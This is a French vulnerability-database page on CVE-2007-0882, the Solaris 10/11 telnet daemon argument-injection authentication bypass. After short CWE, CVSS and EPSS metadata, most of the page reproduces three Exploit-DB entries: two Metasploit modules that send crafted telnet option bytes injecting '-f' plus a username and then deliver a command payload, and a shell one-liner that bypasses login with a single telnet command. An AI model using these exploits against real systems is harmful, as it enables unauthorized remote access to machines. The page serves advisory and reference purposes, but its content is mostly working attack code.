Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-88 |
Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') The product constructs a string for a command to be executed by a separate component
in another control sphere, but it does not properly delimit the
intended arguments, options, or switches within that command string. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 9918
Date de publication : 2007-02-11 23h00 +00:00
Auteur : MC
EDB Vérifié : Yes
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',
'Description' => %q{
This module exploits the argument injection vulnerabilty
in the telnet daemon (in.telnetd) of Solaris 10 and 11.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-0882' ],
[ 'OSVDB', '31881'],
[ 'BID', '22512' ],
],
'Privileged' => false,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
[
['Automatic', { }],
],
'DisclosureDate' => 'Feb 12 2007',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(23),
OptString.new('USER', [ true, "The username to use", "bin" ]),
], self.class)
end
def exploit
connect
print_status('Setting USER environment variable...')
req = "\xFF\xFD\x26\xFF\xFB\x26\xFF\xFD\x03\xFF\xFB"
req << "\x18\xFF\xFB\x1F\xFF\xFB\x20\xFF\xFB\x21\xFF"
req << "\xFB\x22\xFF\xFB\x27\xFF\xFD\x05"
sock.put(req)
sock.get_once
req << "\xFF\xFC\x25"
sock.put(req)
sock.get_once
req << "\xFF\xFA\x26\x01\x01\x02\xFF\xF0"
sock.put(req)
sock.get_once
req << "\xFF\xFA\x1F\x00\x50\x00\x18\xFF\xF0"
sock.put(req)
sock.get_once
req << "\xFF\xFE\x26\xFF\xFC\x23\xFF\xFC\x24"
sock.put(req)
sock.get_once
req = "\xFF\xFA\x18\x00\x58\x54\x45\x52\x4D\xFF"
req << "\xF0\xFF\xFA\x27\x00\x00\x55\x53\x45\x52"
req << "\x01\x2D\x66" + datastore['USER'] + "\xFF\xF0"
sock.put(req)
sock.get_once
sleep(0.25)
sock.put(payload.encoded + "\n")
sleep(0.25)
handler
end
end
Exploit Database EDB-ID : 16328
Date de publication : 2010-06-21 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: fuser.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',
'Description' => %q{
This module exploits the argument injection vulnerabilty
in the telnet daemon (in.telnetd) of Solaris 10 and 11.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9583 $',
'References' =>
[
[ 'CVE', '2007-0882' ],
[ 'OSVDB', '31881'],
[ 'BID', '22512' ],
],
'Privileged' => false,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
[
['Automatic', { }],
],
'DisclosureDate' => 'Feb 12 2007',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(23),
OptString.new('USER', [ true, "The username to use", "bin" ]),
], self.class)
end
def exploit
connect
print_status('Setting USER environment variable...')
req = "\xFF\xFD\x26\xFF\xFB\x26\xFF\xFD\x03\xFF\xFB"
req << "\x18\xFF\xFB\x1F\xFF\xFB\x20\xFF\xFB\x21\xFF"
req << "\xFB\x22\xFF\xFB\x27\xFF\xFD\x05"
sock.put(req)
sock.get_once
req << "\xFF\xFC\x25"
sock.put(req)
sock.get_once
req << "\xFF\xFA\x26\x01\x01\x02\xFF\xF0"
sock.put(req)
sock.get_once
req << "\xFF\xFA\x1F\x00\x50\x00\x18\xFF\xF0"
sock.put(req)
sock.get_once
req << "\xFF\xFE\x26\xFF\xFC\x23\xFF\xFC\x24"
sock.put(req)
sock.get_once
req = "\xFF\xFA\x18\x00\x58\x54\x45\x52\x4D\xFF"
req << "\xF0\xFF\xFA\x27\x00\x00\x55\x53\x45\x52"
req << "\x01\x2D\x66" + datastore['USER'] + "\xFF\xF0"
sock.put(req)
sock.get_once
select(nil,nil,nil,0.25)
sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
select(nil,nil,nil,0.25)
handler
end
end
Exploit Database EDB-ID : 3293
Date de publication : 2007-02-10 23h00 +00:00
Auteur : kingcope
EDB Vérifié : Yes
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope
[email protected]"
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1
# milw0rm.com [2007-02-11]
Products Mentioned
Configuraton 0
Oracle>>Solaris >> Version 10
Oracle>>Solaris >> Version 11
Sun>>Sunos >> Version 5.10
Sun>>Sunos >> Version 5.11
Références